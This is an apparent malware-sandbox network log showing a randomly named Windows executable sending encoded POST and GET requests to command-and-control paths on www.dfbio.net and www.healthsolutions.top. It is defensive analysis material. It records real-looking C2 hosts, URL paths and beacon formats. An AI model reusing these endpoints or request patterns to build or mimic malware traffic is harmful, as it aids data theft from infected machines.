                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6c 4c 32 3d 31 5a 52 74 58 26 4b 78 64 4c 67 4e 69 3d 77 6b 51 32 6a 6d 53 38 79 4d 78 67 52 6c 4b 55 50 78 58 5a 4f 53 4a 66 79 32 37 36 54 49 67 56 33 39 68 4d 52 30 64 6f 31 44 36 73 44 54 44 6f 6d 30 35 35 52 4d 47 47 56 6c 5a 46 51 55 76 64 44 56 4f 2b 70 67 65 4b 66 35 4a 61 4c 6e 31 41 4b 34 30 78 2f 74 53 59 53 4d 41 61 6d 41 31 34 6d 66 31 6b 4a 37 6a 79 52 52 43 36 57 69 79 4d 73 49 33 58 6e 76 34 42 6b 58 4b 79 6e 42 37 6d 4d 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lL2=1ZRtX&KxdLgNi=wkQ2jmS8yMxgRlKUPxXZOSJfy276TIgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x/tSYSMAamA14mf1kJ7jyRRC6WiyMsI3Xnv4BkXKynB7mMQ=="}</script></head></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              29192.168.2.549747218.247.68.184805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:19:49.078818083 CEST712OUTPOST /yzen/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 208
                              Host: www.dfbio.net
                              Origin: http://www.dfbio.net
                              Referer: http://www.dfbio.net/yzen/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 44 2f 39 64 56 66 4a 59 76 71 39 47 44 69 6f 47 48 54 6e 55 57 53 33 44 65 58 6a 30 77 61 70 6d 66 76 66 75 53 61 72 39 63 6c 4b 55 6a 70 64 62 39 66 4b 30 59 70 74 65 56 37 31 56 37 78 41 58 46 76 2b 6f 7a 37 6c 67 56 6e 35 6f 33 55 71 38 65 62 64 6c 6c 59 43 6e 64 72 69 47 58 36 44 36 6b 72 2b 7a 45 6d 78 6d 34 65 51 69 4e 61 4e 62 67 57 61 32 66 6e 37 57 49 61 75 57 78 78 77 35 62 6c 70 6e 42 35 79 58 4b 72 37 35 4a 59 63 73 47 72 5a 62 51 30 79 56 54 4a 7a 69 4a 61 30 6e 52 36 70 5a 2f 42 39 64 76 43 63 76 30 6e 6e 39 4d 70 54 69 56 64 78 2b 6e 63 69 78 36 61 35 42 62 45 4d 68 63 71 30 3d
                              Data Ascii: KxdLgNi=D/9dVfJYvq9GDioGHTnUWS3DeXj0wapmfvfuSar9clKUjpdb9fK0YpteV71V7xAXFv+oz7lgVn5o3Uq8ebdllYCndriGX6D6kr+zEmxm4eQiNaNbgWa2fn7WIauWxxw5blpnB5yXKr75JYcsGrZbQ0yVTJziJa0nR6pZ/B9dvCcv0nn9MpTiVdx+ncix6a5BbEMhcq0=
                              Aug 30, 2024 09:19:50.045754910 CEST1236INHTTP/1.1 404 Not Found
                              Server: wts/1.7.0
                              Date: Fri, 30 Aug 2024 07:19:49 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Cache-Control: private
                              Content-Encoding: gzip
                              Strict-Transport-Security: max-age=31536000
                              Data Raw: 38 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 [TRUNCATED]
                              Data Ascii: 86cX{o{l(R$kH@$]($B*ym18iG7<H&!Vvl7H+{Il-0E9w^}0_!:+^8?Db,as/dB!c1LG>X%#j5QM'lgB,O#JubyVB*14I*F7jV#QzD>'--'tIL..@HWff3aX%[-&uI,e:js(qW\Q~FFpE)EUD2DRcBgmj(VNqZNl'= ]M:j%SpzMkT4zT*Dfx(@J|d%fW2LR6[Q5&2~j<LwH.S:0T7#3eKtZ-7R:l`$Ml(O!5%]h"`@u-f`TM)J((W)bJ-XEROxhLE$K5cAmq!~DVCU!1=3cB;,^Hu+C0Z,cx#]0Z60*w}`Qp/RBjSDGO]m{Shp|Z"@'"'<BdML[e-9|@PzMW1w8$.X"*f+0,!t1bV;sHg+gF`Q'SC
                              Aug 30, 2024 09:19:50.045790911 CEST1217INData Raw: c9 a1 d1 e1 e1 f0 39 0e aa c8 c3 9e b3 bd 43 fd 23 a2 a2 82 9e b3 6c a7 ac 9a 68 ab dd 52 38 98 db ae 64 79 1b aa a6 31 01 15 81 04 1e 41 43 3b 35 22 3e 68 3d a6 16 cc d6 4c 16 83 84 7f 06 35 91 54 94 ee c0 cb 56 5f 33 2d ce f4 59 60 16 97 8a 09
                              Data Ascii: 9C#lhR8dy1AC;5">h=L5TV_3-Y`MBjICJ\p=m`=,0NvuDyZA\)(B=)p $0'`HVZ\:, !pQd|`\$&UY&ua;<AMNGD'\`X"c


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              30192.168.2.549748218.247.68.184805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:19:51.630683899 CEST732OUTPOST /yzen/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 228
                              Host: www.dfbio.net
                              Origin: http://www.dfbio.net
                              Referer: http://www.dfbio.net/yzen/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 44 2f 39 64 56 66 4a 59 76 71 39 47 43 44 34 47 55 43 6e 55 58 79 33 45 56 33 6a 30 37 36 70 69 66 76 6a 75 53 62 2f 74 63 58 75 55 6a 4d 68 62 2b 61 6d 30 64 70 74 65 65 62 31 55 31 52 41 63 46 76 36 57 7a 2b 64 67 56 6e 46 6f 33 56 61 38 64 71 64 71 6d 6f 43 6c 45 62 69 41 54 36 44 36 6b 72 2b 7a 45 6d 6b 44 34 65 59 69 4f 71 64 62 69 30 79 31 53 48 37 52 4a 61 75 57 38 52 77 39 62 6c 70 52 42 38 71 75 4b 74 33 35 4a 64 67 73 43 70 78 59 46 6b 79 54 4d 35 79 33 45 36 70 43 56 4d 31 69 33 79 34 6e 35 7a 30 4d 31 52 4b 58 57 4c 62 4b 47 39 64 47 33 50 71 47 72 71 59 6f 42 6e 63 52 43 39 69 39 78 72 63 54 56 78 58 39 33 2b 6c 6b 48 54 45 75 38 35 4f 69
                              Data Ascii: KxdLgNi=D/9dVfJYvq9GCD4GUCnUXy3EV3j076pifvjuSb/tcXuUjMhb+am0dpteeb1U1RAcFv6Wz+dgVnFo3Va8dqdqmoClEbiAT6D6kr+zEmkD4eYiOqdbi0y1SH7RJauW8Rw9blpRB8quKt35JdgsCpxYFkyTM5y3E6pCVM1i3y4n5z0M1RKXWLbKG9dG3PqGrqYoBncRC9i9xrcTVxX93+lkHTEu85Oi
                              Aug 30, 2024 09:19:52.600596905 CEST1236INHTTP/1.1 404 Not Found
                              Server: wts/1.7.0
                              Date: Fri, 30 Aug 2024 07:19:52 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Cache-Control: private
                              Content-Encoding: gzip
                              Strict-Transport-Security: max-age=31536000
                              Data Raw: 38 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 [TRUNCATED]
                              Data Ascii: 86cX{o{l(R$kH@$]($B*ym18iG7<H&!Vvl7H+{Il-0E9w^}0_!:+^8?Db,as/dB!c1LG>X%#j5QM'lgB,O#JubyVB*14I*F7jV#QzD>'--'tIL..@HWff3aX%[-&uI,e:js(qW\Q~FFpE)EUD2DRcBgmj(VNqZNl'= ]M:j%SpzMkT4zT*Dfx(@J|d%fW2LR6[Q5&2~j<LwH.S:0T7#3eKtZ-7R:l`$Ml(O!5%]h"`@u-f`TM)J((W)bJ-XEROxhLE$K5cAmq!~DVCU!1=3cB;,^Hu+C0Z,cx#]0Z60*w}`Qp/RBjSDGO]m{Shp|Z"@'"'<BdML[e-9|@PzMW1w8$.X"*f+0,!t1bV;sHg+gF`Q'SC
                              Aug 30, 2024 09:19:52.600615025 CEST1217INData Raw: c9 a1 d1 e1 e1 f0 39 0e aa c8 c3 9e b3 bd 43 fd 23 a2 a2 82 9e b3 6c a7 ac 9a 68 ab dd 52 38 98 db ae 64 79 1b aa a6 31 01 15 81 04 1e 41 43 3b 35 22 3e 68 3d a6 16 cc d6 4c 16 83 84 7f 06 35 91 54 94 ee c0 cb 56 5f 33 2d ce f4 59 60 16 97 8a 09
                              Data Ascii: 9C#lhR8dy1AC;5">h=L5TV_3-Y`MBjICJ\p=m`=,0NvuDyZA\)(B=)p $0'`HVZ\:, !pQd|`\$&UY&ua;<AMNGD'\`X"c


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              31192.168.2.549749218.247.68.184805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:19:54.178549051 CEST1749OUTPOST /yzen/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 1244
                              Host: www.dfbio.net
                              Origin: http://www.dfbio.net
                              Referer: http://www.dfbio.net/yzen/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 44 2f 39 64 56 66 4a 59 76 71 39 47 43 44 34 47 55 43 6e 55 58 79 33 45 56 33 6a 30 37 36 70 69 66 76 6a 75 53 62 2f 74 63 58 6d 55 69 35 74 62 2b 35 2b 30 61 70 74 65 64 62 31 52 31 52 41 64 46 70 53 53 7a 2f 67 56 56 69 4a 6f 32 33 43 38 56 2b 70 71 39 59 43 6c 5a 72 69 46 58 36 43 69 6b 72 75 4a 45 6d 30 44 34 65 59 69 4f 76 5a 62 6c 6d 61 31 51 48 37 57 49 61 75 6b 78 78 77 56 62 6c 68 76 42 38 6d 2b 4c 64 58 35 49 39 51 73 41 38 74 59 59 55 79 52 50 35 7a 30 45 36 6c 52 56 49 56 66 33 78 6b 64 35 77 6b 4d 30 51 37 68 4f 4b 76 39 56 64 55 72 79 76 53 4b 78 2b 30 76 48 6c 55 2f 47 4e 61 4d 73 4c 49 41 55 33 54 6b 36 4c 4d 33 57 55 49 63 77 4d 2f 54 7a 57 57 78 59 39 33 43 6f 38 2f 2f 51 46 39 41 73 43 37 62 47 48 6a 45 67 52 36 66 6d 49 34 59 2f 62 79 48 6f 64 6e 72 2b 34 57 51 5a 78 6d 6d 74 77 41 52 67 33 46 33 78 2b 72 76 42 4a 58 64 55 73 71 6c 44 47 4b 4a 68 4b 38 35 48 67 6e 42 31 31 46 4f 37 35 68 7a 78 46 49 79 37 41 38 61 44 75 42 79 4f 30 76 6f 44 5a 6c 42 67 68 [TRUNCATED]
                              Data Ascii: KxdLgNi=D/9dVfJYvq9GCD4GUCnUXy3EV3j076pifvjuSb/tcXmUi5tb+5+0aptedb1R1RAdFpSSz/gVViJo23C8V+pq9YClZriFX6CikruJEm0D4eYiOvZblma1QH7WIaukxxwVblhvB8m+LdX5I9QsA8tYYUyRP5z0E6lRVIVf3xkd5wkM0Q7hOKv9VdUryvSKx+0vHlU/GNaMsLIAU3Tk6LM3WUIcwM/TzWWxY93Co8//QF9AsC7bGHjEgR6fmI4Y/byHodnr+4WQZxmmtwARg3F3x+rvBJXdUsqlDGKJhK85HgnB11FO75hzxFIy7A8aDuByO0voDZlBghG/DoUNXZz3GsF4Gx8bsAKrMgexM7Onk06ZNe36bpFJg2N7z8SA1KdOE833g88eRF752qXmGPvOczVXxV+LryKc142JBGMQIu24fpkS5QnaCOvvp9uBZNPVj3+bkanKNHK7q9yVbHMlYzqM4IJkma0P/nE1UCA+nKtX2TlNXZIR7tOfSE+YTR1k6r2ny4ksWTbsFUOZWFiClZuloltZ0cIXYEC9XH7AymcYN97/GYpWLJFC3BHqOlo1zqc1L4hk7TFAQrwA+RhltV/VZMx5EVWmzj3veyKIXHtQcjfqGXhCqih487SZ28AVnZboZsUdSao5a9CLOB11YuKZzprXW2tfK52R1uiWRKH3WGCxwzKrpM9NAst58Zuc+T8SW32NSqBapwuovAzcKroyRex1AZYBYmnhczZYxSeFxjI2y5oRInmTcIz4P8cCbzbVwzYRBHwFuyS6XemMQvBgKglraKpf/GbhFvqaCsPxKsjJ/GHn4AMDOmAW1/QUEkQXnGbHT4Y9oIniUEFFZ635VJEdB406kh/Bsnbjdo34aY5c8qkEu/tT0PG9sY1y+cUtHfRAnVayUs8o6MDODYoq5MNHk2L59TWHEBN71SH2MKaP3YO5FfBS0T6dHTCV5vu0r5C21yUhp6MbtN2afsI/woGkkhyivs1CDKN8Dz3T [TRUNCATED]
                              Aug 30, 2024 09:19:55.132332087 CEST1236INHTTP/1.1 404 Not Found
                              Server: wts/1.7.0
                              Date: Fri, 30 Aug 2024 07:19:54 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Cache-Control: private
                              Content-Encoding: gzip
                              Strict-Transport-Security: max-age=31536000
                              Data Raw: 38 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 [TRUNCATED]
                              Data Ascii: 86cX{o{l(R$kH@$]($B*ym18iG7<H&!Vvl7H+{Il-0E9w^}0_!:+^8?Db,as/dB!c1LG>X%#j5QM'lgB,O#JubyVB*14I*F7jV#QzD>'--'tIL..@HWff3aX%[-&uI,e:js(qW\Q~FFpE)EUD2DRcBgmj(VNqZNl'= ]M:j%SpzMkT4zT*Dfx(@J|d%fW2LR6[Q5&2~j<LwH.S:0T7#3eKtZ-7R:l`$Ml(O!5%]h"`@u-f`TM)J((W)bJ-XEROxhLE$K5cAmq!~DVCU!1=3cB;,^Hu+C0Z,cx#]0Z60*w}`Qp/RBjSDGO]m{Shp|Z"@'"'<BdML[e-9|@PzMW1w8$.X"*f+0,!t1bV;sHg+gF`Q'SC
                              Aug 30, 2024 09:19:55.132349014 CEST1217INData Raw: c9 a1 d1 e1 e1 f0 39 0e aa c8 c3 9e b3 bd 43 fd 23 a2 a2 82 9e b3 6c a7 ac 9a 68 ab dd 52 38 98 db ae 64 79 1b aa a6 31 01 15 81 04 1e 41 43 3b 35 22 3e 68 3d a6 16 cc d6 4c 16 83 84 7f 06 35 91 54 94 ee c0 cb 56 5f 33 2d ce f4 59 60 16 97 8a 09
                              Data Ascii: 9C#lhR8dy1AC;5">h=L5TV_3-Y`MBjICJ\p=m`=,0NvuDyZA\)(B=)p $0'`HVZ\:, !pQd|`\$&UY&ua;<AMNGD'\`X"c


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              32192.168.2.549750218.247.68.184805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:19:56.724605083 CEST455OUTGET /yzen/?KxdLgNi=O9V9WpJA2Id3CQ8RbCyxNyy8YHr+x7luQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvuQ5PpqBCp66EiUa7dY4bjGHbWiFISykJbmA24D38d4U9gmj0KuNkWrH/Oj7BpqHw==&lL2=1ZRtX HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-us
                              Connection: close
                              Host: www.dfbio.net
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Aug 30, 2024 09:19:57.700685978 CEST1236INHTTP/1.1 404 Not Found
                              Server: wts/1.7.0
                              Date: Fri, 30 Aug 2024 07:19:57 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Cache-Control: private
                              Strict-Transport-Security: max-age=31536000
                              Data Raw: 31 33 30 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 e8 af a6 e7 bb 86 e9 94 99 e8 af af 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a [TRUNCATED]
                              Data Ascii: 130f<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;
                              Aug 30, 2024 09:19:57.700709105 CEST224INData Raw: 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67
                              Data Ascii: color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"t
                              Aug 30, 2024 09:19:57.700722933 CEST1236INData Raw: 72 65 62 75 63 68 65 74 20 4d 53 22 2c 56 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 0a 20 63 6f 6c 6f 72 3a 23 46 46 46 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 43 38 37 42 32 3b 20 0a 7d 23 63 6f 6e 74 65 6e 74
                              Data Ascii: rebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .content-c
                              Aug 30, 2024 09:19:57.700795889 CEST1236INData Raw: 74 65 6e 74 22 3e 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 0a 20 20 3c 68 33 3e 48 54 54 50 20 e9 94 99 e8 af af 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 20
                              Data Ascii: tent"> <div class="content-container"> <h3>HTTP 404.0 - Not Found</h3> <h4></h4> </div> <div class="content-container"> <fieldset><h4>:</h4>
                              Aug 30, 2024 09:19:57.700808048 CEST1221INData Raw: 61 73 73 3d 22 61 6c 74 22 3e 3c 74 68 3e e5 a4 84 e7 90 86 e7 a8 8b e5 ba 8f 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 53 74 61 74 69 63 46 69 6c 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72
                              Data Ascii: ass="alt"><th></th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th></th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" c


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              33192.168.2.54975113.248.169.48805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:20:02.920675993 CEST742OUTPOST /cent/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 208
                              Host: www.healthsolutions.top
                              Origin: http://www.healthsolutions.top
                              Referer: http://www.healthsolutions.top/cent/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
